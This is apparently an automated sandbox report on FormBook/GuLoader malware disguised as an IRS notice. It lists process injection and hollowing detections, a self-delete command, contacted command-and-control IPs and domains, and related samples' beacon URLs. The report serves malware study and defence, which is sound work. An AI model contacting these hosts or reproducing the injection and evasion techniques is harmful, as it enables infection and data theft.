      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056817D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568161 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568119 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681DD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568198 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568250 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056825E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568271 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568211 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568205 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568296 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056741C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005666D1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563EE3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F15 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F0C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F21 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05028D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05003D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FEC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FEC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050205AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050205AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_05008DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_0502740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F6D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04FD6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F835A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F8FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F82581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exe  Code function: 3_2_04F52D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\cmstp.exe  Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe  Network Connect: 153.126.209.136 80
      Source: C:\Windows\explorer.exe  Network Connect: 172.67.209.95 80
      Source: C:\Windows\explorer.exe  Network Connect: 199.59.242.153 80
      Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe  Network Connect: 216.58.207.179 80
      Source: C:\Windows\explorer.exe  Network Connect: 147.255.30.94 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmstp.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\cmstp.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Thread register set: target process: 3424
      Source: C:\Windows\SysWOW64\cmstp.exe  Thread register set: target process: 3424
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: CA0000
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Process created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: C:\Windows\SysWOW64\cmstp.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: explorer.exe, 00000002.00000000.716705067.0000000000AD8000.00000004.00000020.sdmp  Binary or memory string: ProgmanMD6
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmp  Binary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmp  Binary or memory string: Progman
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.734930880.000000000A716000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWnd5D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe  Code function: 0_2_021D3879 cpuid

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match  File source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match  File source: Process Memory Space: cmstp.exe PID: 2860, type: MEMORY
      Source: Yara match  File source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match  File source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      One line per tactic column, techniques listed top to bottom as in the matrix; the digits the matrix attaches to some techniques are kept in parentheses.

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: Shared Modules (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
      Privilege Escalation: Process Injection (512); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
      Defense Evasion: Virtualization/Sandbox Evasion (22); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing; Steganography
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: Security Software Discovery (721); Virtualization/Sandbox Evasion (22); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); System Information Discovery (311)
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
      Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

      Behavior Graph

      Behavior Graph ID: 338078
      Sample: IRS Notice Letter pdf docum...
      Startdate: 11/01/2021
      Architecture: WINDOWS
      Score: 100

      Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Yara detected GuLoader; 11 other signatures

      Process tree:
      IRS Notice Letter pdf document.exe (started)
          Signatures: Tries to detect Any.run; Hides threads from debuggers
          -> IRS Notice Letter pdf document.exe (started)
              DNS/IP: adojetson.com 198.187.29.67, 49730, 80 NAMECHEAP-NETUS United States
              Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
              -> explorer.exe (injected)
                  DNS/IP: aizimov.com 153.126.209.136, 49738, 80 SAKURA-ASAKURAInternetIncJP Japan; www.aksaystudios.com 147.255.30.94, 49737, 80 LEASEWEB-USA-LAX-11US United States; 18 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit)
                  -> cmstp.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                          -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains


                                                Contacted URLs


                                                URLs from Memory and Binaries

                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.sakkal.comexplorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | unknown | United States | 395082 | BODIS-NJUS | true
153.126.209.136 | unknown | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
172.67.209.95 | unknown | United States | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
198.187.29.67 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
216.58.207.179 | unknown | United States | 15169 | GOOGLEUS | true
147.255.30.94 | unknown | United States | 395954 | LEASEWEB-USA-LAX-11US | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 338078
Start date: 11.01.2021
Start time: 16:21:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 54s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: IRS Notice Letter pdf document.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@17/7
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 29.8% (good quality ratio 25.7%)
• Quality average: 69.8%
• Quality standard deviation: 33.9%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 205.185.216.42, 205.185.216.10
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/338078/sample/IRS Notice Letter pdf document.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
199.59.242.153 | mQFXD5FxGT.exe | malicious | thevampire_vvv.byethost32.com/loglogin.html
199.59.242.153 | 099898892.exe | malicious | www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
199.59.242.153 | ZIPEXT#U007e1.EXE | malicious | ww1.survey-smiles.com/
199.59.242.153 | SAWR000148651.exe | malicious | www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
199.59.242.153 | SHIPPING INVOICEpdf.exe | malicious | www.biphome.com/th7/?Wxo=F3X7BvJsNeC3FygCw13H4IB8jadIkqJtXdmqtCOR8NGnB4xp+pRJAqP9Tbys+XJlW324&vB=lhvxP
199.59.242.153 | IRS Notice Letter.exe | malicious | www.fallguysgen.com/09rb/?BjR=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1YP1OuE1trgD&ojPLdR=9r9xbv2Prvr4
199.59.242.153 | IRS Notice Letter.exe | malicious | www.fallguysgen.com/09rb/?QL3=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1bj2SeINgKdVJ18iPg==&vDH4Y=N8lT8DApP2
199.59.242.153 | Payment Order Inv.exe | malicious | www.lakecharlesloan.com/m98/
199.59.242.153 | h3dFAROdF3.exe | malicious | www.srteamsex.com/jskg/?8pgD2lkp=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&yTIDml=X6XHfZU8d
199.59.242.153 | kqwqyoFz1C.exe | malicious | www.srteamsex.com/jskg/?9roHn=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&npHhW=3fq4gDD0abs8
199.59.242.153 | file.exe | malicious | www.capialhealth.com/w8en/?wZ=OZNhib&iJE=PC3EVoXx07elaN9zQ9JVPu3uhPMA8lrp9yOZFfU9U+2Z+rMvgXeGWrCKYNniyi9/Q+4F/80NIg==
199.59.242.153 | PByYRsoSNX.exe | malicious | www.traptlongview.com/csv8/?wPX=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWD0h5HAfE9z&UPnDHz=SVETu4vhSBmH6
199.59.242.153 | 3Y690n1UsS.exe | malicious | www.globepublishers.com/csv8/?SR-D3jP=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODb9flfr/+N&J0GTk=3fPL-xo0rXp0UNn
199.59.242.153 | Purchase_Order_39563854854.xlsx | malicious | www.globepublishers.com/csv8/?AZ=QLtdsMlSP8ZUl/vaR7fAeOzLoSV1+fXm7wO8n0yFGAmKofcRkm3OZJHpkrvnm/Rsk+r9zQ==&1bqtf=oL30w6o
199.59.242.153 | SOA121520.exe | malicious | www.lsi.xyz/t4vo/?9rspyh=ffh4_hPhQ&xRWxBfL=WfdqmDLeiX8A0XbRcwwI20exgn5R1EzGuKMWaYP6QiJJcsRpHAz5FYgMhHdlC+3EYXet
199.59.242.153 | googlechrome_3843.exe | malicious | www.traptlongview.com/csv8/?jL30v=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjkuYX4BhU0&JB4DYN=9rhd62lx1hk
199.59.242.153 | cap.exe | malicious | www.baackstage.com/llp/?1b8xixO=6djViKV/KVq+HnQ3cpIGEwepNd6s+5Q/jlAYWiJQrTJ+jateGwi7y5pfa/hOw9lZ7yPB&k2Jdyb=fDHXWLx0Sx
199.59.242.153 | Order_009.xlsx | malicious | www.traptlongview.com/csv8/?Oxop=9GN7fGOD/QNnrVwwG5TxviJgjVB4/la6Mj5ArBFsvpBF6fDOf/nW3cYumwPyqITLKiJE7w==&Az=mrG0J
199.59.242.153 | hO3eV0L7FB.exe | malicious | www.traptlongview.com/csv8/?LXe09=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWP0ypLDGU9liE66TA==&lh28=O0GliFfpjJXxzb
199.59.242.153 | Z7G2lyR0tT.exe | malicious | www.traptlongview.com/csv8/?9r1Tl=D4n4&t8r8=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0
153.126.209.136 | IRS Notice Letter.exe | malicious | www.aizimov.com/09rb/?BjR=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&ojPLdR=9r9xbv2Prvr4
153.126.209.136 | IRS Notice Letter.exe | malicious | www.aizimov.com/09rb/?QL3=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qJzYhnhBNUMDO7Gwrw==&vDH4Y=N8lT8DApP2
34.102.136.180 | PO 24000109490.xlsx | malicious | www.triagggroup.com/8rg4/?LR-8qNt=K2rufiHMe1HBlSywa5RpczlcUQQQ1/TYEtUAxTz/46ubTXsziv/5HqKDRe6dILzkzKhkQA==&2d=WpU0Ih
34.102.136.180 | n#U00b0 761.doc | malicious | www.vflat.world/rcm/?apD=vyU/Tx1AyGq6P1KbfXU5Q644DJK02cEur7LuMmKZp7R4jQtlLylTZyD77zfTFNZc1MGYdg==&3fo=iJBl4
34.102.136.180 | 099898892.exe | malicious | www.brandonprattdrums.com/nt8e/?2dj=mo28pwJ51vR7IKzcErLQfhewF/WLLcApj+7PDtKvhICMJgKvsKAxR2M21SX93kSu6T94&BR-LnJ=YVJpeDOX
34.102.136.180 | QN08qH1zYv.exe | malicious | www.mack-soldenfx.com/xle/?vTdLK=zk2US6ALLIc6arggsfAZommmveE5A5NJASnJ6UHH5r4rOoISbaIiLhdL5oVRMJccM0tfjg8s/Q==&S2Jl9Z=RRcTylbXy0tX
34.102.136.180 | Pending PURCHASE ORDER - 47001516.pdf.exe | malicious | www.xtrememasksanitizer.com/iic6/?MZQL=BeFFqPdhkfo4YZUiluaYyIXGELR26NUuXp6ku0wPmcSGsxxfxgzZlIWRJrlNh4urnk9m&u4ThA=cjlh2bLhQXW4VlC
34.102.136.180 | FTH2004-005.exe | malicious | www.alchemdiagnostics.com/s9zh/?1bVLg=BxHvwtdyFJ7g92C4A5CuAB0OHS50ujic6t3+DR/Y4zUr9N/SujKusNJSI910IJ6X2qqp&5jU=t8BdyvA8CfOh
34.102.136.180 | Confirm!!!..exe | malicious | www.2ndstars.com/t052/?NTxxQl=kWAkelHGgdo7g3ENjcuZYWRtx6Um9/M76c0CGs2oR1LVTEGV88g4Rb8BVkGD2ny/bXwz&Cj6LF=9rj018f
34.102.136.180 | S4P1JiBZIZxvtFR.exe | malicious | www.messianicentertainment.com/2bb/?uFQl=kkXKsXZLNI4gBqBMZnLMx+MJLl0nvMnQLQrcKe3K73J7IZ4WxrNtBiw99n4y9XLDO1BP&BTJt=fvRh_lDXgxKpGD
34.102.136.180 | inv.exe | malicious | www.aquaticboxing.com/tabo/?D81lv=X2MtetF0hVQlMV&ElS=udq4EqCY1sGjuCFcNjoU0kkiQeG4O9kLCw/6nZg/A67VP7YDt57NxgCk26dWAo1v1R92
34.102.136.180 | PO21010699XYJ.exe | malicious | www.endpedophiles.com/ehxh/?Mfg=zzMqP3gr9AvtiM4KAG8kTXsRbsDP8AWJ/7zGMGcvxlaU9iwirqdQaCWQ+gUE2qqEedZ3&uTxXo=hpm8lT3hSlbTI81
34.102.136.180 | PO(2021.01.08).exe | malicious | www.franchisethings.com/2kf/?4h2=VnwHU&-ZsT=FRucAsUD05vcOy1xt8vuNCdNozwBi3l0B73pDlnlNmCQs1pGwWBkT8eviTh9ohGwSZkGTZJ41g==
34.102.136.180 | 2143453.exe | malicious | www.inclusivefamilybookshop.com/0wdn/?k8Phg=w9i/rl1/osAgFjs7ySrF/ASYKL7k42SXygbwPl6tuPkKLJ9C1FUMoix68dO63dZaXOXH&v2=Wh0xlrm
34.102.136.180 | order.exe | malicious | www.nationshiphop.com/hko6/?UlSp=bvjd1hRx9LEdQt&tXU0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1jTZSli8tU4
34.102.136.180 | SKM_C258201001130020005057.exe | malicious | www.trucktiresdirect.net/qef6/?Q2J=fjlpdDePPPndHZ&D0G=FQEtPSkz80CxgXgcOOi6rBlloiOK2hGatG8UTKVevdzK7vsAog45RkTrPdlXQ+unlwNP
34.102.136.180 | Petronas ITQ format.exe | malicious | www.deejayatl.com/khm/?LZnt=weorFEFAbZos1b3NmfMzLqv4HDBnPJvO10u/GA3R//5N2v27k50EjWxcIqlDjETw64WeGfn7Mw==&T48p=Ntx0_bGx4r0P6Nk
34.102.136.180 | Request for quotation, Purchase Order no 1093121.exe | malicious | www.deejayatl.com/khm/?ohrXP=weorFEFAbZos1b3NmfMzLqv4HDBnPJvO10u/GA3R//5N2v27k50EjWxcIpJT/1PL9N/P&QL0=uVvxtJA0Xta09
34.102.136.180 | order no. 3643.exe | malicious | www.crowdcrew.info/0wdn/?QzuP3V=KfvDIX0H&Bl=tXOTe1FEWOW0yVOxQefLdNUt3lESNM85tpQzglgCPzmTkNhoYF4SOCpecoMutLP9Zb97
34.102.136.180 | Confirmation!!!.exe | malicious | www.crazyvine.wine/t052/?TTj0AF=uFQDALMXcjo0yVQ&mRYxt2k=/GkOf4KKZxg+V6U8rDR+Egp2P9CO+bLKiQJEqWm1e/CwbKlpvn8K5DIBW8gaQNp3y8hovOhPTQ==
34.102.136.180 | order FTH2004-005 .exe | malicious | www.empireplumbingandheating.com/s9zh/?ATRPddU=oT0NYVkogC0z2SAthoaLoXNHp+LhJn8LSVunJ+2mR2NZOMMFNtyVp4W6SGtsMBPpY6p2&iX=VDKTfFHhMFgXPJb
